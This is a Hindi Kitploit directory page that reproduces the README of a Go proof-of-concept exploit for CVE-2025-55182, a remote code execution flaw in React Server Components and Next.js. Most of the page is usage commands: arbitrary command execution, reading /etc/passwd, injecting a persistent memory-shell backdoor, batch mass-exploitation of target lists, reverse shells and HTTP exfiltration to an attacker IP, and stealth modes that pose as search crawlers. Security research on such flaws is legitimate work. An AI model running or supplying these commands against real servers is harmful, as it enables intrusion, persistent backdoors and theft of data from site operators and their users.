Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-golang-PoC — Go-आधारित प्रूफ-ऑफ-कॉन्सेप्ट CVE-2025-55182 के लिए, जो React Server Components में एक गंभीर RCE है। इसमें भेद्यता जाँच, कमांड निष्पादन, मेमोरी शेल इंजेक्शन, रिवर्स शेल, बैच स्कैनिंग, और अधिकृत सुरक्षा परीक्षण के लिए प्रॉक्सी समर्थन शामिल है। | Kitploit
उपकरण/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

Go-आधारित प्रूफ-ऑफ-कॉन्सेप्ट CVE-2025-55182 के लिए, जो React Server Components में एक गंभीर RCE है। इसमें भेद्यता जाँच, कमांड निष्पादन, मेमोरी शेल इंजेक्शन, रिवर्स शेल, बैच स्कैनिंग, और अधिकृत सुरक्षा परीक्षण के लिए प्रॉक्सी समर्थन शामिल है।

रिपॉजिटरी देखेंवेबसाइट
6199 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 React Server Components RCE - Go PoC

⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए ⚠️

विवरण

CVE-2025-55182 (जिसे CVE-2025-66478 के नाम से भी जाना जाता है) React Server Components (Flight प्रोटोकॉल) में एक गंभीर Remote Code Execution (RCE) भेद्यता है। यह टूल सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण के लिए PoC का एक Go कार्यान्वयन है।

प्रभावित संस्करण:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (पैच से पहले: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (16.0.7 से पहले)
  • Next.js: 14.3.0-canary.77 और बाद के कैनरी संस्करण

भेद्यता विवरण

यह एक्सप्लॉइट Flight प्रोटोकॉल डिसीरियलाइज़ेशन में प्रोटोटाइप पॉल्यूशन का लाभ उठाता है:

  1. Chunk संदर्भ प्राप्त करने के लिए $@ डिसीरियलाइज़ेशन का उपयोग करता है
  2. Chunk.prototype.then को रूट ऑब्जेक्ट के then प्रॉपर्टी के रूप में रखता है
  3. नियंत्रित नकली चंक के साथ initializeModelChunk को कॉल करने के लिए स्टेटस को RESOLVED_MODEL पर सेट करता है
  4. Blob डिसीरियलाइज़ेशन को ट्रिगर करता है जो हमलावर पेलोड के साथ response._formData.get को कॉल करता है
  5. मनमाना कोड निष्पादन के लिए response._formData.get को Function कंस्ट्रक्टर पर सेट करता है

विशेषताएँ

  • पूर्ण RCE क्षमता - आउटपुट के साथ मनमाने कमांड निष्पादित करें
  • भेद्यता जाँच मोड - एक्सप्लॉइटेशन के बिना सुरक्षित पहचान
  • Next.js संस्करण पहचान - स्वचालित संस्करण फिंगरप्रिंटिंग
  • मेमोरी शेल इंजेक्शन - /exec?cmd= पर स्थायी बैकडोर
  • बैच स्कैनिंग - JSON आउटपुट के साथ मल्टी-थ्रेडेड स्कैनिंग
  • व्यापक प्रॉक्सी समर्थन:
    • प्रमाणीकरण के साथ/बिना SOCKS5
    • SOCKS4/SOCKS4a
    • प्रमाणीकरण के साथ/बिना HTTP/HTTPS प्रॉक्सी
  • स्टील्थ मोड - ब्राउज़र, क्रॉलर, सुरक्षा User-Agent
  • रेट लिमिटिंग - अनुरोधों के बीच कॉन्फ़िगर करने योग्य विलंब
  • रिवर्स शेल - mkfifo + nc (Alpine/busybox पर काम करता है)
  • डेटा एक्सफिल्ट्रेशन - हमलावर सर्वर पर कमांड आउटपुट POST करें
  • क्रॉस-प्लेटफ़ॉर्म बिल्ड - 30+ OS/आर्किटेक्चर संयोजन
  • JSON आउटपुट - स्वचालन के लिए मशीन-पठनीय परिणाम

इंस्टॉलेशन

प्री-बिल्ट बाइनरी

अपने प्लेटफ़ॉर्म के लिए नवीनतम रिलीज़ GitHub Releases से डाउनलोड करें।

उपलब्ध बाइनरी:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
  • और भी...

स्रोत से

# Clone repository
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Build for current platform
go build -o cve-2025-55182 .

# Or build for all platforms
chmod +x build.sh
./build.sh

स्रोत से बिल्ड करें

./build.sh चलाने के बाद, सभी समर्थित प्लेटफ़ॉर्मों के लिए बाइनरी build/ निर्देशिका में उपलब्ध होंगी।

उपयोग

मूल कमांड

# Check single target for vulnerability
./cve-2025-55182 -u http://target:3000 --check

# Detect Next.js version
./cve-2025-55182 -u http://target:3000 --version-check

# Execute command with output
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

मेमोरी शेल (स्थायी बैकडोर)

# Inject memory shell (checks if already installed first)
./cve-2025-55182 -u http://target:3000 --memshell

# Test if memory shell is active
./cve-2025-55182 -u http://target:3000 --test-shell

# Execute command via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# After injection, you can also use curl directly:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

कस्टम हेडर और SSL बाईपास

# Add custom headers (can be used multiple times)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Skip SSL certificate verification (for self-signed certs)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combine with other options
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

प्रॉक्सी समर्थन

# SOCKS5 with authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 without authentication
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# SOCKS4 proxy
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# HTTP proxy
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

बैच स्कैनिंग

# Batch check from file
./cve-2025-55182 --urls targets.txt --check

# Batch scan with JSON output
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Batch scan with multiple threads and stealth
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Save vulnerable targets to file
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Batch memory shell injection
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Batch command execution
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

नेटवर्क एक्सफिल्ट्रेशन

# Reverse shell (mkfifo + nc, works on Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Start listener on attacker machine first:
nc -lvnp 4444

# Exfiltrate command output via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Start listener: nc -lvnp 4444

विकल्प

विकल्पविवरण
-u, --urlलक्ष्य URL (जैसे, http://localhost:3000)
-f, --fileलक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
--urls-f/--file का उपनाम
-o, --outputभेद्य लक्ष्यों के लिए आउटपुट फ़ाइल
--jsonपरिणाम JSON प्रारूप में आउटपुट करें
-c, --commandनिष्पादित करने के लिए कमांड (आउटपुट के साथ)
--checkभेद्यता की जाँच करें
--version-checkNext.js संस्करण का पता लगाएं
--proxyप्रॉक्सी URL (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
-H, --headerकस्टम हेडर (कई बार उपयोग किया जा सकता है)
-k, --insecureSSL/TLS प्रमाणपत्र सत्यापन छोड़ें
--stealthस्टील्थ मोड: browser, crawler, security (डिफ़ॉल्ट: browser)
--delayअनुरोधों के बीच विलंब (जैसे, 2s, 500ms)
--variantsगहन जाँच के लिए कई पेलोड वेरिएंट का उपयोग करें
--memshellमेमोरी शेल इंजेक्ट करें (स्थायी बैकडोर)
--test-shellजाँचें कि मेमोरी शेल सक्रिय है या नहीं
--shell-execमेमोरी शेल के माध्यम से कमांड निष्पादित करें
--revshell IP PORTरिवर्स शेल स्थापित करें
--exfil CMD IP PORTकमांड निष्पादित करें और आउटपुट POST करें
-t, --timeoutसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--threadsसमवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 10)
--workers--threads का उपनाम
--nocolorरंगीन आउटपुट अक्षम करें (Windows/पाइप के लिए)
-h, --helpसहायता संदेश दिखाएं
-v, --versionसंस्करण दिखाएं

प्रॉक्सी प्रकार

socks5://user:pass@ip:port  - SOCKS5 with authentication
socks5://ip:port            - SOCKS5 without authentication  
socks5h://ip:port           - SOCKS5 with remote DNS resolution
socks4://ip:port            - SOCKS4 proxy
socks4a://ip:port           - SOCKS4a proxy
http://user:pass@ip:port    - HTTP proxy with authentication
http://ip:port              - HTTP proxy without authentication
https://ip:port             - HTTPS proxy

स्टील्थ मोड

मोडविवरण
browserवास्तविक ब्राउज़र अनुरोधों की नकल करता है (Chrome, Firefox, Safari, Edge) - डिफ़ॉल्ट
crawlerसर्च इंजन क्रॉलर की नकल करता है (Googlebot, Bingbot, Baiduspider, आदि)
securityसुरक्षा स्कैनर User-Agent का उपयोग करता है (Nessus, Nuclei)

मेमोरी शेल

मेमोरी शेल सुविधा एक स्थायी बैकडोर इंजेक्ट करती है जो:

टूल डाउनलोड करें